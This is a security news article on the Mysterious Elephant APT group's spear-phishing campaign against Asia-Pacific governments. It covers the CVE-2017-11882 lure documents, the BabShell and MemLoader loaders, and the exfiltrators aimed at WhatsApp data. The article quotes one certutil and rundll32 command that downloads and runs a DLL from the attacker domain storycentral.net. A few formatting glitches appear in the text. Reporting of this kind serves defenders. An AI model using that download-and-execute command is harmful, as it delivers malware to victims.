In recent months, a new advanced persistent threat (APT) group known as Mysterious Elephant has emerged as a formidable adversary targeting government and diplomatic institutions across the Asia-Pacific region.
First identified by Kaspersky’s Global Research and Analysis Team (GReAT) in 2023, the group has continued to refine its toolkit, employing both custom-built malware and modified open-source utilities to evade detection and maintain long-term access.
Early indicators pointed to simple phishing lures delivering weaponized documents, but the latest campaign exhibits a significant evolution in both delivery mechanisms and post-exploitation tooling.
Initial incursions leveraged spear-phishing emails embedding malicious Office documents exploiting CVE-2017-11882.
Upon user interaction, these documents drop a lightweight PowerShell loader that retrieves more complex payloads from attacker-controlled infrastructure. This loader, dubbed BabShell, serves as the foundation of the threat actor’s modular framework.
As the campaign progressed into 2025, Mysterious Elephant integrated a second-stage loader, MemLoader HidenDesk, to inject remote access trojans directly into memory, reducing forensic artifacts on disk.
Securelist analysts noted that subsequent phases of the operation focus on exfiltrating sensitive WhatsApp data, including documents, images, and archives, using custom exfiltrators named Uplo Exfiltrator and Stom Exfiltrator.
.webp "Mysterious Elephant APT Hackers Infiltrate Organization to Steal Sensitive Information 3")
These components encode stolen data with XOR-based obfuscation before transmitting it via HTTP to wildcard DNS domains such as storycentral.net and monsoonconference.com.
By leveraging legitimate domains and HTTPS, the group blends malicious traffic with normal corporate web use, complicating network-based detection.
# Download and execute BabShell payload
certutil -urlcache -f "hxxp://storycentral.net/BabShell.dll" BabShell.dll
rundll32.exe BabShell.dll,EntryPointInfection Mechanism
The infection chain begins with a spear-phishing email containing a seemingly benign meeting invitation in an RTF document.
When opened, the document triggers a memory corruption vulnerability in the Office Equation Editor (CVE-2017-11882), silently spawning a PowerShell process.
This PowerShell instance operates in hidden mode (-nop -w hidden) and uses .NET’s WebClient class to fetch the BabShell DLL loader.
Once loaded, BabShell decrypts its embedded configuration, which includes C2 URLs and module names, before invoking its EntryPoint export to establish a heartbeat channel.
After initial beaconing, BabShell fetches the MemLoader HidenDesk module, injecting it into a system service process.
This in-memory loader parses a custom packet format, decompresses the RAT payload (a variant of Remcos), and transfers execution to the newly mapped code.
By avoiding disk writes, MemLoader HidenDesk significantly diminishes kinetic evidence, allowing Mysterious Elephant to navigate laterally and harvest target data undetected.
The group’s use of open-source codebases, combined with proprietary modifications, underscores both resourcefulness and technical sophistication.
Through these multi-stage infection tactics, Mysterious Elephant continues to refine its approach, demanding equally adaptive defense strategies from security teams tasked with safeguarding sensitive information.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
